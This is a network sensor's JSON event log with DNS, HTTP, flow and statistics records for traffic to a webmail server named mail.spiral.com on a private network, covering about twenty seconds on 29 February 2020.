{"timestamp":"2020-02-29T00:08:59.961986+0000","flow_id":795898973717572,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44755,"proto":"UDP","dns":{"type":"answer","id":19807,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:00.000117+0000","event_type":"stats","stats":{"uptime":14192,"capture":{"kernel_packets":134094,"kernel_drops":0},"decoder":{"pkts":134112,"bytes":92665607,"invalid":184,"ipv4":132645,"ipv6":8,"ethernet":134112,"raw":0,"null":0,"sll":0,"tcp":127476,"udp":4970,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2727,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2743,"synack":2734,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1768,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2267,"failed_udp":110},"tx":{"http":4564,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2346}},"flow_mgr":{"closed_pruned":2706,"new_pruned":15,"est_pruned":2317,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20502,"memcap_state":0,"memcap_g
lobal":0},"http":{"memuse":92699,"memcap":0}}} {"timestamp":"2020-02-29T00:09:00.000475+0000","flow_id":158826455069850,"event_type":"flow","src_ip":"192.168.10.122","src_port":42601,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:59.357530+0000","end":"2020-02-29T00:03:59.469367+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:00.019586+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525}} {"timestamp":"2020-02-29T00:09:00.292803+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36696,"tx_id":1}} 
{"timestamp":"2020-02-29T00:09:00.304656+0000","flow_id":1395802825860624,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56407,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39008,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:00.413211+0000","flow_id":1395802825860624,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56407,"proto":"UDP","dns":{"type":"answer","id":39008,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:00.413211+0000","flow_id":1395802825860624,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56407,"proto":"UDP","dns":{"type":"answer","id":39008,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:00.482461+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":958}} {"timestamp":"2020-02-29T00:09:00.482461+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":958},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:09:01.000220+0000","flow_id":1832429181487928,"event_type":"flow","src_ip":"192.168.10.122","src_port":47014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:00.084792+0000","end":"2020-02-29T00:04:00.190190+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:05.483487+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":958},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2478,"tx_id":2}} {"timestamp":"2020-02-29T00:09:06.448779+0000","flow_id":816196989671691,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40498,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23974,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:09:06.465234+0000","flow_id":1235763754834258,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50319,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28746,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:06.557375+0000","flow_id":816196989671691,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40498,"proto":"UDP","dns":{"type":"answer","id":23974,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:06.557375+0000","flow_id":816196989671691,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40498,"proto":"UDP","dns":{"type":"answer","id":23974,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:06.573102+0000","flow_id":1235763754834258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50319,"proto":"UDP","dns":{"type":"answer","id":28746,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:06.573102+0000","flow_id":1235763754834258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50319,"proto":"UDP","dns":{"type":"answer","id":28746,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:06.763752+0000","flow_id":1278752082539280,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6127}} {"timestamp":"2020-02-29T00:09:06.849661+0000","flow_id":1096924642080953,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34776,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:09:06.858247+0000","flow_id":1205458465593479,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58650,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":55420,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:06.968272+0000","flow_id":1205458465593479,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58650,"proto":"UDP","dns":{"type":"answer","id":55420,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:06.968272+0000","flow_id":1205458465593479,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58650,"proto":"UDP","dns":{"type":"answer","id":55420,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:09:07.000198+0000","event_type":"stats","stats":{"uptime":14199,"capture":{"kernel_packets":134141,"kernel_drops":0},"decoder":{"pkts":134146,"bytes":92679633,"invalid":184,"ipv4":132675,"ipv6":8,"ethernet":134146,"raw":0,"null":0,"sll":0,"tcp":127502,"udp":4974,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2727,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2743,"synack":2734,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1768,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2269,"failed_udp":110},"tx":{"http":4566,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2348}},"flow_mgr":{"closed_pruned":2707,"new_pruned":15,"est_pruned":2319,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21164,"memcap_state":0,"memcap_global":0},"http":{"memuse":54407,"memcap":0}}} 
{"timestamp":"2020-02-29T00:09:07.001323+0000","flow_id":1073078963949837,"event_type":"flow","src_ip":"192.168.10.122","src_port":49816,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:06.676109+0000","end":"2020-02-29T00:04:06.787475+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:08.000523+0000","flow_id":1274951032280348,"event_type":"flow","src_ip":"192.168.10.130","src_port":34764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1291,"bytes_toclient":1056,"start":"2020-02-29T00:08:02.038172+0000","end":"2020-02-29T00:08:07.254988+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:10.000529+0000","flow_id":1197830584211840,"event_type":"flow","src_ip":"192.168.10.122","src_port":45696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:09.268672+0000","end":"2020-02-29T00:04:09.374158+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:10.345020+0000","flow_id":339305296184252,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33829,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61178,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:09:10.453617+0000","flow_id":339305296184252,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33829,"proto":"UDP","dns":{"type":"answer","id":61178,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:10.453617+0000","flow_id":339305296184252,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33829,"proto":"UDP","dns":{"type":"answer","id":61178,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:10.521043+0000","flow_id":127932775662908,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":410}} {"timestamp":"2020-02-29T00:09:10.521043+0000","flow_id":127932775662908,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":410},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} 
{"timestamp":"2020-02-29T00:09:11.000542+0000","flow_id":1451800606154932,"event_type":"flow","src_ip":"192.168.10.81","src_port":52702,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":2,"pkts_toclient":1,"bytes_toserver":128,"bytes_toclient":74,"start":"2020-02-29T00:08:10.925876+0000","end":"2020-02-29T00:08:10.926127+0000","age":0,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"16","tcp_flags_ts":"06","tcp_flags_tc":"12","syn":true,"rst":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:11.001968+0000","flow_id":1684033767133257,"event_type":"flow","src_ip":"192.168.10.122","src_port":53940,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:10.577609+0000","end":"2020-02-29T00:04:10.689883+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:11.764976+0000","flow_id":1278752082539280,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34774,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6127},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30701,"tx_id":0}} {"timestamp":"2020-02-29T00:09:11.000848+0000","flow_id":1066967241298197,"event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 
x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":2}} {"timestamp":"2020-02-29T00:09:12.622045+0000","flow_id":1076287324585437,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41432,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:12.730774+0000","flow_id":1076287324585437,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37956,"proto":"UDP","dns":{"type":"answer","id":41432,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:12.730774+0000","flow_id":1076287324585437,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37956,"proto":"UDP","dns":{"type":"answer","id":41432,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:12.821690+0000","flow_id":2001607963729589,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34778,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3336}} 
{"timestamp":"2020-02-29T00:09:13.002042+0000","flow_id":1066967241298197,"event_type":"flow","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":21,"bytes_toserver":2524,"bytes_toclient":19141,"start":"2020-02-29T00:08:07.954645+0000","end":"2020-02-29T00:08:10.923602+0000","age":3,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:14.000277+0000","event_type":"stats","stats":{"uptime":14206,"capture":{"kernel_packets":134195,"kernel_drops":0},"decoder":{"pkts":134204,"bytes":92704354,"invalid":185,"ipv4":132733,"ipv6":8,"ethernet":134204,"raw":0,"null":0,"sll":0,"tcp":127551,"udp":4982,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2730,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2746,"synack":2737,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1771,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2273,"failed_udp":110},"tx":{"http":4569,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2352}},"flow_mgr":{"closed_pruned":2709,"new_pruned":15,"est_pruned
":2322,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":2,"flows_timeout":3,"flows_timeout_inuse":1,"flows_removed":2,"rows_checked":65536,"rows_skipped":65530,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20832,"memcap_state":0,"memcap_global":0},"http":{"memuse":76072,"memcap":0}}} {"timestamp":"2020-02-29T00:09:14.001007+0000","flow_id":1835650407822727,"event_type":"flow","src_ip":"192.168.10.122","src_port":34876,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:13.095623+0000","end":"2020-02-29T00:04:13.201001+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:14.001181+0000","flow_id":1842054204037946,"event_type":"flow","src_ip":"192.168.10.122","src_port":56174,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:13.858938+0000","end":"2020-02-29T00:04:13.964382+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:14.001244+0000","flow_id":1596077147384852,"event_type":"flow","src_ip":"192.168.10.130","src_port":34766,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1237,"bytes_toclient":6071,"start":"2020-02-29T00:08:07.945172+0000","end":"2020-02-29T00:08:13.158534+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:09:15.521386+0000","flow_id":127932775662908,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":410},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":757,"tx_id":0}} {"timestamp":"2020-02-29T00:09:17.000561+0000","flow_id":422558938389413,"event_type":"flow","src_ip":"192.168.10.81","src_port":52704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1227,"bytes_toclient":1755,"start":"2020-02-29T00:08:11.088997+0000","end":"2020-02-29T00:08:16.285131+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:17.822586+0000","flow_id":2001607963729589,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34778,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3336},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":16766,"tx_id":0}} 
{"timestamp":"2020-02-29T00:09:18.001282+0000","flow_id":1214726986095481,"event_type":"flow","src_ip":"192.168.10.122","src_port":48057,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:17.809849+0000","end":"2020-02-29T00:04:17.921212+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 